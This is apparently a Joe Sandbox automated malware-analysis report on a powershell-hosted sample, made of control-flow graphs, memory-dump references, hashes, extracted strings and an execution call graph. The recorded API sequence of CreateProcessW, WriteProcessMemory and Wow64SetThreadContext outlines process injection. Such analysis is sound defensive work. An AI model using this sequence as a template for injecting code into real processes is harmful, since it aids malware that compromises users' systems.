                                                                                                                      • Instruction Fuzzy Hash: D931E736F0520ADFDB989E68C4506A6BBD1AFD6690B2484ABD045CF291DF31C8D1CB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 621 6f13027-6f1303f 623 6f13046-6f13048 621->623 624 6f13060-6f130b7 623->624 625 6f1304a-6f13050 623->625 626 6f13052 625->626 627 6f13054-6f13056 625->627 626->624 627->624
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q
                                                                                                                      • API String ID: 0-3120983240
                                                                                                                      • Opcode ID: cd69f48b015f6830c83f8feef742ef570d00175175037daf75313c2092b0eecf
                                                                                                                      • Instruction ID: 77d079f10a8f9645591f5f321c732c723bab0e61fef94e906de278398dbe515d
                                                                                                                      • Opcode Fuzzy Hash: cd69f48b015f6830c83f8feef742ef570d00175175037daf75313c2092b0eecf
                                                                                                                      • Instruction Fuzzy Hash: 5BE0D877F0824D8FDF589AAC90603E97BF17F81694F118496C4818B145C7214809C363

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 629 809414-80b139 632 80b141-80b148 629->632 633 80b13b-80b13e 629->633 634 80b153-80b169 632->634 635 80b14a-80b150 632->635 633->632 636 80b174-80b217 CreateProcessW 634->636 637 80b16b-80b171 634->637 635->634 639 80b220-80b298 636->639 640 80b219-80b21f 636->640 637->636 647 80b2aa-80b2b1 639->647 648 80b29a-80b2a0 639->648 640->639 649 80b2b3-80b2c2 647->649 650 80b2c8 647->650 648->647 649->650 652 80b2c9 650->652 652->652
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72B110FC,?), ref: 0080B204
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 0079de03ef76f5a8f604ce5d29e153599b040c1381deef7f6e5428c86f359b25
                                                                                                                      • Instruction ID: 538411d40e396beb00b849ba8b2b800bc3db428144b322a7948467d9dbe6564e
                                                                                                                      • Opcode Fuzzy Hash: 0079de03ef76f5a8f604ce5d29e153599b040c1381deef7f6e5428c86f359b25
                                                                                                                      • Instruction Fuzzy Hash: F251F4B19012199FDB64CF99C980BDDBBB5FF48314F1080AAE909B7250DB75AA88CF51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 653 809438-80b4be 655 80b4c0-80b4c6 653->655 656 80b4c8-80b501 WriteProcessMemory 653->656 655->656 657 80b503-80b509 656->657 658 80b50a-80b52b 656->658 657->658
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: e723424495cae809ecbcb1196b236d9af3c4562d6c692c526ed42f7daad2492a
                                                                                                                      • Instruction ID: 3247793e3bd769a82298cc5c199935bbcf304d8033709af9c299b9fe3ee405a0
                                                                                                                      • Opcode Fuzzy Hash: e723424495cae809ecbcb1196b236d9af3c4562d6c692c526ed42f7daad2492a
                                                                                                                      • Instruction Fuzzy Hash: 0A21F5B1910349DFDB50CF9AD984BDEBBF4FB48310F108429E918A7241D378AA44CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 660 80b470-80b472 661 80b474-80b479 660->661 662 80b47a-80b4be 660->662 661->662 663 80b4c0-80b4c6 662->663 664 80b4c8-80b501 WriteProcessMemory 662->664 663->664 665 80b503-80b509 664->665 666 80b50a-80b52b 664->666 665->666
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: 735722d6c67e756fe20793096bc9e521334615db9ba28a63f38158711e7f5120
                                                                                                                      • Instruction ID: 33976cd00dd6921cffc64b764345dd433a78432cc7aa3828a05bddf2e8fa79e8
                                                                                                                      • Opcode Fuzzy Hash: 735722d6c67e756fe20793096bc9e521334615db9ba28a63f38158711e7f5120
                                                                                                                      • Instruction Fuzzy Hash: F221D5B1D102499FDB50CF99D985BEEBBF4FB48310F10842AE518E7251D378AA44CB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 682 80b2f9-80b2fa 683 80b302-80b340 682->683 684 80b2fc-80b301 682->684 685 80b342-80b34a 683->685 686 80b34c-80b378 Wow64SetThreadContext 683->686 684->683 685->686 687 80b381-80b3a2 686->687 688 80b37a-80b380 686->688 688->687
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: 41fcafd7c3bae466e612eb0772b6f181a4863fc8db911f6aa275e962553b38a6
                                                                                                                      • Instruction ID: b5cc1321e2725799c1b5793dcfcc840c343baab6a660f15c1fcdc94ffb5c2f82
                                                                                                                      • Opcode Fuzzy Hash: 41fcafd7c3bae466e612eb0772b6f181a4863fc8db911f6aa275e962553b38a6
                                                                                                                      • Instruction Fuzzy Hash: 021126B2D102498FDB10CF9AD945BEEBBF4FB88320F258029E458A3750D3789945CFA1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 668 809420-80b340 670 80b342-80b34a 668->670 671 80b34c-80b378 Wow64SetThreadContext 668->671 670->671 672 80b381-80b3a2 671->672 673 80b37a-80b380 671->673 673->672
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: e6f0e4c5b2c5ad526c9367470156f982983ccde174ebb028008531dbfdf89187
                                                                                                                      • Instruction ID: ea340601a4159652341c23c30be210b69be46d87ab9b09dd2a9ce9f8f9df9464
                                                                                                                      • Opcode Fuzzy Hash: e6f0e4c5b2c5ad526c9367470156f982983ccde174ebb028008531dbfdf89187
                                                                                                                      • Instruction Fuzzy Hash: 061114B2D1020A8FDB50CF9AC944BDEBBF4FB88320F258029E418A3740D378A545CFA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 675 809444-80b340 677 80b342-80b34a 675->677 678 80b34c-80b378 Wow64SetThreadContext 675->678 677->678 679 80b381-80b3a2 678->679 680 80b37a-80b380 678->680 680->679
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_800000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: d2ba28aef26e750a131e7c50b2e1c8df72dcdea615f355d83f86c4589b40e1c1
                                                                                                                      • Instruction ID: 2353882d9e4570d73e9f04b3221bcd21f1c456de67087960149056aca2396daa
                                                                                                                      • Opcode Fuzzy Hash: d2ba28aef26e750a131e7c50b2e1c8df72dcdea615f355d83f86c4589b40e1c1
                                                                                                                      • Instruction Fuzzy Hash: 1B1114B2D102498FDB50CF9AC944BDEBBF4FB88320F258029E419A3740D378A545CFA5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2323688236.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_75d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c7dfb52da1cc19be0ffcdfb1b62e9ceaa99b9db21d25b716ca3ebb72db4cf65a
                                                                                                                      • Instruction ID: 62b7ae5d77caa712e16d55712269084db76a8f52227904ff47a23705da6223d5
                                                                                                                      • Opcode Fuzzy Hash: c7dfb52da1cc19be0ffcdfb1b62e9ceaa99b9db21d25b716ca3ebb72db4cf65a
                                                                                                                      • Instruction Fuzzy Hash: 22016D6140D3C09FE7228B258C84692BFA4DF53225F0981DBEC888F1A3C2685C49C771
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2323688236.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_75d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 62d31d1e5e5f7119891e3dfc69dff55b8dbd9b84d94fa8157ba9e5cf780b94c6
                                                                                                                      • Instruction ID: 6c44ec0fae0883e6eda2a8a71114310f25544b26f0e3dcfe2979983260719c16
                                                                                                                      • Opcode Fuzzy Hash: 62d31d1e5e5f7119891e3dfc69dff55b8dbd9b84d94fa8157ba9e5cf780b94c6
                                                                                                                      • Instruction Fuzzy Hash: 6001F2715043409AE7308A29CDC4BA7BF98DF41322F28C41AEC0C0A282C2BC9C4ACAB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3477e4700d0d5d527290e4f20a8f0e6f4fdd4ab8c85cd4434aaacc5f331fa597
                                                                                                                      • Instruction ID: d6c5e74b3a8e76ada01b9af6dca6b409ca475ff420993fc5c3d473eadec9bd06
                                                                                                                      • Opcode Fuzzy Hash: 3477e4700d0d5d527290e4f20a8f0e6f4fdd4ab8c85cd4434aaacc5f331fa597
                                                                                                                      • Instruction Fuzzy Hash: 23F022307403087BD6A066698806B2E38DAAF84B54F608018B509DF3D1CCB5EEC043AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b85828724d0d2c98121caa9e3447ae19121c1d9d4af59e4f616ff643f28ab963
                                                                                                                      • Instruction ID: 3de2af455eb1fbf5305a147220e1412a8931434a06625d6862a1e93d9ee193ec
                                                                                                                      • Opcode Fuzzy Hash: b85828724d0d2c98121caa9e3447ae19121c1d9d4af59e4f616ff643f28ab963
                                                                                                                      • Instruction Fuzzy Hash: FD01AF6050E3C69FC76797B488244A2BFB19F8724071D44CFD0C5CE1A3ED248986C3A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-1742154110
                                                                                                                      • Opcode ID: 1ed7e2b155820537d1f055d2ec98accc7c4ea58842e9af4511a3e57f52b65bc9
                                                                                                                      • Instruction ID: d73ac09bd498da899ddd32c03e54d5c0e4cf15e19fa6546326cfd821e9cb8745
                                                                                                                      • Opcode Fuzzy Hash: 1ed7e2b155820537d1f055d2ec98accc7c4ea58842e9af4511a3e57f52b65bc9
                                                                                                                      • Instruction Fuzzy Hash: 85F14431F04349CFDB65CB6888447AABFF2EF85790F1480ABDA558F241DB318995C7A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-2353078639
                                                                                                                      • Opcode ID: e34fc66794ce45c180f861f2df303ccd43bb8fa7928b6d274bf0e992d619ac11
                                                                                                                      • Instruction ID: eaefeda77c52b8e85bdb25ba40c29a6a1dcc6674ad142c0d946f4f1574a151d5
                                                                                                                      • Opcode Fuzzy Hash: e34fc66794ce45c180f861f2df303ccd43bb8fa7928b6d274bf0e992d619ac11
                                                                                                                      • Instruction Fuzzy Hash: 1131F871F00209CFCB689BAD946066ABBE2ABC5650F14807BC545CF248EB31C6D1C791
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $]q$$]q$$]q$$]q
                                                                                                                      • API String ID: 0-858218434
                                                                                                                      • Opcode ID: e0d206a2510e1d07b27665af10ff5e982a80b84a2e2914f4ff410b7ec745863e
                                                                                                                      • Instruction ID: 082bfa15aa4d9f21db9d7e1759a53c3e7f94e3e4fdb4ba339a7dda839f3a2e8f
                                                                                                                      • Opcode Fuzzy Hash: e0d206a2510e1d07b27665af10ff5e982a80b84a2e2914f4ff410b7ec745863e
                                                                                                                      • Instruction Fuzzy Hash: 1E210232D04345DFEBA59E288840B66BBF0AF41690F1844ABD884CF242DF3185C4CBA2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4']q$4']q$$]q$$]q
                                                                                                                      • API String ID: 0-978391646
                                                                                                                      • Opcode ID: d54d0c65af80d6a0c3496e2d2d39921f933d8948f6d8ee500ed481294025d046
                                                                                                                      • Instruction ID: a134f4d29b287ab063707d5345ff4d1f021f0b4d9955a482acb480a485afd000
                                                                                                                      • Opcode Fuzzy Hash: d54d0c65af80d6a0c3496e2d2d39921f933d8948f6d8ee500ed481294025d046
                                                                                                                      • Instruction Fuzzy Hash: D4014F11B0D3864FC76B167D0C201556FB65F835A032A42DBD4D1DF2E7CE554D8583A7

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:31.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:4.4%
                                                                                                                      Total number of Nodes:1847
                                                                                                                      Total number of Limit Nodes:93
                                                                                                                      execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap RtlFreeHeap 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 15 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 14 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 13 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8521 40c4e3 8514->8521 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8521 8523 4040bb 13 API calls 8519->8523 8520 405f08 4 API calls 8522 40c005 8520->8522 8521->8515 8525 40c021 8522->8525 8658 40a43f 8522->8658 8524 40c3f3 8523->8524 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8535 40c4dd 8532->8535 8533 40c411 8720 405a87 8533->8720 8534 402bab 2 API calls 8534->8525 8537 405695 2 API calls 8535->8537 8537->8521 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 